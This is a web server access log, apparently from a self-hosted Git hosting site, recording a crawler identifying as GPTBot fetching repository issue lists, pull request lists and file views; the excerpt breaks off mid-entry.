"/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/activate?display=rendered" [Client 74.7.227.38] [Length 11195] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/activate" +[17/Feb/2026:19:23:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod03_ctypes.pyc?display=rendered" [Client 74.7.227.38] [Length 11167] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:19:23:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod03_ctypes.pyc?display=rendered" [Client 74.7.227.38] [Length 11167] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:19:23:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod03_ctypes.pyc?display=rendered" [Client 74.7.227.38] [Length 11168] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:19:23:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10221] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&project=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:23:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10042] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:23:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md?display=rendered" [Client 74.7.227.38] [Length 72911] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:19:23:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?milestone=-1&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10032] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?milestone=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:23:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?milestone=-1&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10203] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?milestone=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:19:23:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?milestone=-1&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10029] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?project=-1&sort=recentupdate&state=open&type=all" +[17/Feb/2026:19:23:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?milestone=-1&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10204] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?milestone=-1&sort=recentupdate&state=open&type=all" +[17/Feb/2026:19:23:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?milestone=-1&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10206] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?project=-1&sort=nearduedate&state=open&type=all" +[17/Feb/2026:19:23:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?milestone=-1&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10038] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?milestone=-1&sort=leastupdate&state=closed&type=all" +[17/Feb/2026:19:23:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/activate?display=source" [Client 74.7.227.38] [Length 13216] [Gzip 3.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/activate" +[17/Feb/2026:19:23:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/python?display=rendered" [Client 74.7.227.38] [Length 11216] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/python" +[17/Feb/2026:19:23:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/uvicorn?display=rendered" [Client 74.7.227.38] [Length 11215] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/uvicorn" +[17/Feb/2026:19:23:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/websockets?display=source" [Client 74.7.227.38] [Length 11779] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/websockets" +[17/Feb/2026:19:23:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&milestone=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10033] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&milestone=-1&sort=nearduedate&state=all&type=all" +[17/Feb/2026:19:23:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10031] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&project=-1&sort=oldest&state=open&type=all" +[17/Feb/2026:19:23:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10182] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:23:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10179] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=recentupdate&state=closed&type=all" +[17/Feb/2026:19:23:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10193] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:23:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&milestone=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10194] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&milestone=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:19:23:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10051] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:23:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10026] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:23:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10020] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:23:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10219] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&sort=oldest&state=closed&type=all" +[17/Feb/2026:19:23:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10230] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&project=-1&sort=oldest&state=closed&type=all" +[17/Feb/2026:19:23:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10026] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:23:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10219] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&sort=oldest&state=closed&type=all" +[17/Feb/2026:19:23:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10046] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:23:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10052] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:23:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10043] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:23:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10196] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&sort=leastupdate&state=all&type=all" +[17/Feb/2026:19:23:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&milestone=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10226] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&milestone=-1&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:19:23:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10014] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:23:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10020] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:23:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10190] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:23:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&milestone=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10218] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&milestone=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:23:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10197] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:23:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10223] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&sort=leastupdate&state=all&type=all" +[17/Feb/2026:19:23:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?milestone=-1&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10022] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?milestone=-1&project=-1&sort=leastupdate&state=closed&type=all" +[17/Feb/2026:19:23:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?milestone=-1&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10019] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:23:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?milestone=-1&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10019] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:23:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?milestone=-1&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10007] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:23:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?milestone=-1&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10014] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:23:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?milestone=-1&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10197] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:23:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?milestone=-1&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10011] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:23:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10217] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:19:23:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10038] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&sort=oldest&state=all&type=all" +[17/Feb/2026:19:23:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10206] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:19:23:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10034] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&project=-1&state=all&type=all" +[17/Feb/2026:19:23:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10029] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&project=-1&state=all&type=all" +[17/Feb/2026:19:23:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&milestone=-1&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10033] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:23:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&milestone=-1&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10194] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:23:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10020] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:23:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp?display=source" [Client 74.7.227.38] [Length 11436] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" +[17/Feb/2026:19:23:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp?display=source" [Client 74.7.227.38] [Length 11438] [Gzip 3.14] [Sent-to 